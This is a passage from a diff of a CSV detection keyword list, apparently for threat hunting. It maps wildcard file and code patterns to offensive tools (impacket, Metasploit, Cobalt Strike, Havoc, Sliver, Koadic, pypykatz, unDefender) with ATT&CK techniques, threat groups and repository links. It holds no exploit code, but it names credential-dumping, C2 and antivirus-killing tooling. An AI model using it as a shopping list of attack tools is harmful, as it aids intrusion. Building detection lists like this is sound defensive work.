object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactDecoder*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*ImpactPacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*impersonate_token *Administrator*","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1043 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" -"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*impersonate_token *BUILTIN\Administrators*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ImpersonateAndUnload.cpp*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","1","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" "*ImpersonateLocalService*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ImpersonateLoggedOnUser*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" @@ -11566,66 +11719,66 @@ "*imperva_gzip.py*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*Implant*TeamServer.exe*","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. usefull for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","5","81","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*Implant.ImplantGenerator*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*implant.sleep-obf*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*implant/elevate/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/gather/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/inject/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/persist/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*implant/pivot/*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*implant/sliver/*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*Implant\SleepMask*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*implant-callback.*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*ImplantSSP.csproj*","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*import _eternalhush*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" "*import apypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*import BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*import BaseSprayModule*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*import DCSYNC*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","0","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*import DNSListener*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*import EnablePersistence*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*import eternalhush.*","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","140","21","2023-09-21T19:04:41Z","2023-07-09T09:13:21Z" -"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*import IBurpExtender*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","0","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*import impacket*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*import ImpactDecoder*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*import ImpactPacket*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*import LdapSearchBofParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "*import metame","offensive_tool_keyword","metame","metame is a metamorphic code engine for arbitrary executables","T1027 - T1059.003 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/a0rtega/metame","1","0","N/A","N/A","6","508","96","2019-10-06T18:24:14Z","2016-08-07T13:56:57Z" -"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*import mythic*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*import np_server*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*import Payload*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import pe.OBJExecutable*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/wumb0/rust_bof","1","0","N/A","10","10","189","22","2023-03-03T22:53:02Z","2022-02-28T23:46:00Z" "*Import powerview*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*import PupyConfig*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*import pypykatz*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*import ShadowForgeHome*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z" "*import Stager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*import udmp_parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","0","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z" -"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - 